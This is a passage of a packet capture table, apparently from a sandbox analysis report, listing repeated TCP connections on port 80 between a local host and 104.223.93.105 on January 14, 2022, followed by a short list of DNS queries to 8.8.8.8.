                    Jan 14, 2022 07:16:14.432692051 CET8049833104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:14.442856073 CET8049833104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:14.442996979 CET4983380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:14.443042040 CET8049833104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:14.443094969 CET4983380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:14.585604906 CET8049833104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:17.288975954 CET4983480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:17.413116932 CET8049834104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:17.413880110 CET4983480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:17.416397095 CET4983480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:17.540615082 CET8049834104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:17.540833950 CET4983480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:17.665317059 CET8049834104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:17.672099113 CET8049834104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:17.672137022 CET8049834104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:17.672282934 CET4983480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:17.672333002 CET4983480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:17.798283100 CET8049834104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:20.261210918 CET4983580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:20.383900881 CET8049835104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:20.384011984 CET4983580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:20.386728048 CET4983580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:20.510351896 CET8049835104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:20.510426044 CET4983580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:20.633009911 CET8049835104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:20.641201019 CET8049835104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:20.641238928 CET8049835104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:20.641298056 CET4983580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:20.641335011 CET4983580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:20.764887094 CET8049835104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:24.413976908 CET4984180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:24.536729097 CET8049841104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:24.536822081 CET4984180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:24.539316893 CET4984180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:24.661768913 CET8049841104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:24.661875010 CET4984180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:24.784557104 CET8049841104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:24.792671919 CET8049841104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:24.792875051 CET4984180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:24.797208071 CET8049841104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:24.797300100 CET4984180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:24.915410042 CET8049841104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:28.134713888 CET4984280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:28.259022951 CET8049842104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:28.259141922 CET4984280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:28.261720896 CET4984280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:28.386390924 CET8049842104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:28.386477947 CET4984280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:28.510540962 CET8049842104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:28.518954039 CET8049842104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:28.518994093 CET8049842104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:28.519093037 CET4984280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:28.519159079 CET4984280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:28.643759012 CET8049842104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:30.599598885 CET4984380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:30.745405912 CET8049843104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:30.747015953 CET4984380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:30.749545097 CET4984380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:30.872044086 CET8049843104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:30.872180939 CET4984380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:30.994618893 CET8049843104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:31.008444071 CET8049843104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:31.008486986 CET8049843104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:31.008562088 CET4984380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:31.008641958 CET4984380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:31.154020071 CET8049843104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:32.887778044 CET4984580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:33.013290882 CET8049845104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:33.013461113 CET4984580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:33.019782066 CET4984580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:33.144170046 CET8049845104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:33.144319057 CET4984580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:33.269444942 CET8049845104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:33.277029037 CET8049845104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:33.277142048 CET8049845104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:33.277384043 CET4984580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:33.277435064 CET4984580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:33.402080059 CET8049845104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:34.608227968 CET4984680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:34.806478024 CET8049846104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:34.806644917 CET4984680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:34.831557989 CET4984680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:34.955379963 CET8049846104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:34.956110001 CET4984680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:35.079885960 CET8049846104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:35.088538885 CET8049846104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:35.088562012 CET8049846104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:35.088660955 CET4984680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:35.088701010 CET4984680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:35.258850098 CET8049846104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:36.656810999 CET4985280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:36.781191111 CET8049852104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:36.781373978 CET4985280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:36.784149885 CET4985280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:36.908565998 CET8049852104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:36.908672094 CET4985280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:37.032932997 CET8049852104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:37.041826010 CET8049852104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:37.041913033 CET8049852104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:37.041964054 CET4985280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:37.042016983 CET4985280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:37.166363001 CET8049852104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:38.678059101 CET4985780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:38.802007914 CET8049857104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:38.802145004 CET4985780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:38.818540096 CET4985780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:38.943733931 CET8049857104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:38.943881989 CET4985780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:39.067913055 CET8049857104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:39.078356028 CET8049857104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:39.078453064 CET8049857104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:39.078495026 CET4985780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:39.078546047 CET4985780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:39.203959942 CET8049857104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:39.992822886 CET4986480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:40.118062973 CET8049864104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:40.118174076 CET4986480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:40.128746986 CET4986480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:40.274754047 CET8049864104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:40.274898052 CET4986480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:40.406003952 CET8049864104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:40.411902905 CET8049864104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:40.412065029 CET4986480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:40.412219048 CET8049864104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:40.412305117 CET4986480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:40.557964087 CET8049864104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:41.332923889 CET4987180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:41.457168102 CET8049871104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:41.457339048 CET4987180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:41.470923901 CET4987180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:41.612701893 CET8049871104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:41.612869024 CET4987180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:41.736939907 CET8049871104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:41.745306969 CET8049871104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:41.745362997 CET8049871104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:41.745496988 CET4987180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:41.745553017 CET4987180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:41.870076895 CET8049871104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:43.251224041 CET4987380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:43.376113892 CET8049873104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:43.376235962 CET4987380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:43.379060030 CET4987380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:43.544555902 CET8049873104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:43.544672012 CET4987380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:43.667284012 CET8049873104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:43.675276995 CET8049873104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:43.675307989 CET8049873104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:43.675380945 CET4987380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:43.675441980 CET4987380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:43.800158024 CET8049873104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:46.385001898 CET4987580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:46.510519981 CET8049875104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:46.510684967 CET4987580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:46.514857054 CET4987580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:46.638919115 CET8049875104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:46.639029980 CET4987580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:46.764856100 CET8049875104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:46.773838043 CET8049875104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:46.773962021 CET4987580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:46.774027109 CET8049875104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:46.774091005 CET4987580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:46.899167061 CET8049875104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:48.940471888 CET4987680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:49.064888954 CET8049876104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:49.066222906 CET4987680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:49.069116116 CET4987680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:49.193304062 CET8049876104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:49.194155931 CET4987680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:49.318176031 CET8049876104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:49.337191105 CET8049876104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:49.337333918 CET8049876104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:49.337481976 CET4987680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:49.337534904 CET4987680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:49.462435961 CET8049876104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:50.934634924 CET4987780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:51.058355093 CET8049877104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:51.058504105 CET4987780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:51.061156988 CET4987780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:51.185163021 CET8049877104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:51.185406923 CET4987780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:51.340670109 CET8049877104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:51.340956926 CET8049877104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:51.340986013 CET8049877104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:51.341109037 CET4987780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:51.341161013 CET4987780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:51.586000919 CET8049877104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:52.921905994 CET4987980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:53.084893942 CET8049879104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:53.085026026 CET4987980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:53.094090939 CET4987980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:53.252294064 CET8049879104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:53.252428055 CET4987980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:53.410366058 CET8049879104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:53.418189049 CET8049879104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:53.418283939 CET8049879104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:53.418473005 CET4987980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:53.419049025 CET4987980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:53.591042995 CET8049879104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:55.059124947 CET4988280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:55.293260098 CET8049882104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:55.293497086 CET4988280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:55.310735941 CET4988280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:55.471932888 CET8049882104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:55.472043991 CET4988280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:55.638137102 CET8049882104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:55.646163940 CET8049882104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:55.646404028 CET4988280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:55.646706104 CET8049882104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:55.646779060 CET4988280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:55.881314993 CET8049882104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:56.882985115 CET4988380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:57.007147074 CET8049883104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:57.007241964 CET4988380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:57.010126114 CET4988380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:57.134111881 CET8049883104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:57.134207010 CET4988380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:57.258354902 CET8049883104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:57.265400887 CET8049883104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:57.265450001 CET8049883104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:57.265527964 CET4988380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:57.265573025 CET4988380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:57.409358025 CET8049883104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:58.202579975 CET4988480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:58.358258009 CET8049884104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:58.358434916 CET4988480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:58.361671925 CET4988480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:58.658623934 CET8049884104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:58.661470890 CET4988480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:58.867099047 CET8049884104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:58.867147923 CET8049884104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:58.867182016 CET8049884104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:58.867394924 CET4988480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:58.867454052 CET4988480192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:59.196131945 CET8049884104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:59.811501980 CET4988580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:59.934307098 CET8049885104.223.93.105192.168.2.4
                    Jan 14, 2022 07:16:59.935795069 CET4988580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:16:59.960262060 CET4988580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:00.083035946 CET8049885104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:00.083255053 CET4988580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:00.205748081 CET8049885104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:00.213871956 CET8049885104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:00.213901043 CET8049885104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:00.214188099 CET4988580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:00.214246035 CET4988580192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:00.337778091 CET8049885104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:01.078548908 CET4988680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:01.202706099 CET8049886104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:01.202857971 CET4988680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:01.212522984 CET4988680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:01.336873055 CET8049886104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:01.337017059 CET4988680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:01.461545944 CET8049886104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:01.469331980 CET8049886104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:01.469374895 CET8049886104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:01.469602108 CET4988680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:01.469656944 CET4988680192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:01.594127893 CET8049886104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:02.407013893 CET4988780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:02.571803093 CET8049887104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:02.571901083 CET4988780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:02.582056046 CET4988780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:02.704731941 CET8049887104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:02.704819918 CET4988780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:02.827420950 CET8049887104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:02.835235119 CET8049887104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:02.835282087 CET8049887104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:02.835413933 CET4988780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:02.835458040 CET4988780192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:02.964699030 CET8049887104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:03.795865059 CET4988880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:03.919883013 CET8049888104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:03.919981956 CET4988880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:03.930332899 CET4988880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:04.054816008 CET8049888104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:04.054950953 CET4988880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:04.179131031 CET8049888104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:04.186918974 CET8049888104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:04.186963081 CET8049888104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:04.188071012 CET4988880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:04.188131094 CET4988880192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:04.312259912 CET8049888104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:05.076289892 CET4988980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:05.225188017 CET8049889104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:05.225300074 CET4988980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:05.232615948 CET4988980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:05.355463028 CET8049889104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:05.355555058 CET4988980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:05.495887995 CET8049889104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:05.503925085 CET8049889104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:05.503973007 CET8049889104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:05.504144907 CET4988980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:05.504271984 CET4988980192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:05.627093077 CET8049889104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:06.433841944 CET4989080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:06.556536913 CET8049890104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:06.556675911 CET4989080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:06.577783108 CET4989080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:06.700798988 CET8049890104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:06.700897932 CET4989080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:06.829631090 CET8049890104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:06.833031893 CET8049890104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:06.833077908 CET8049890104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:06.833267927 CET4989080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:06.833337069 CET4989080192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:06.956387997 CET8049890104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:07.743130922 CET4989180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:07.866312027 CET8049891104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:07.866413116 CET4989180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:07.881860018 CET4989180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:08.069308043 CET8049891104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:08.070202112 CET4989180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:08.206748009 CET8049891104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:08.206795931 CET8049891104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:08.206825018 CET8049891104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:08.206974983 CET4989180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:08.207102060 CET4989180192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:08.330010891 CET8049891104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:09.617907047 CET4989280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:09.742228031 CET8049892104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:09.742366076 CET4989280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:09.745172977 CET4989280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:09.869291067 CET8049892104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:09.870347977 CET4989280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:10.043747902 CET8049892104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:10.052268028 CET8049892104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:10.052297115 CET8049892104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:10.052454948 CET4989280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:10.082194090 CET4989280192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:10.250915051 CET8049892104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:11.797194004 CET4989380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:11.923357964 CET8049893104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:11.926717997 CET4989380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:11.929100037 CET4989380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:12.055430889 CET8049893104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:12.055680037 CET4989380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:12.180217028 CET8049893104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:12.198611021 CET8049893104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:12.198817015 CET8049893104.223.93.105192.168.2.4
                    Jan 14, 2022 07:17:12.198853970 CET4989380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:12.202121019 CET4989380192.168.2.4104.223.93.105
                    Jan 14, 2022 07:17:12.326718092 CET8049893104.223.93.105192.168.2.4

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 14, 2022 07:15:13.903927088 CET5912353192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:13.923434973 CET53591238.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:15.528506994 CET5453153192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:15.647453070 CET53545318.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:16.862633944 CET4971453192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:16.881752014 CET53497148.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:18.142127991 CET5802853192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:18.261272907 CET53580288.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:19.516477108 CET5309753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:19.535804987 CET53530978.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:21.174777031 CET4925753192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:21.194984913 CET53492578.8.8.8192.168.2.4
                    Jan 14, 2022 07:15:24.109755039 CET6238953192.168.2.48.8.8.8
                    Jan 14, 2022 07:15:24.226423979 CET53623898.8.8.8192.168.2.4
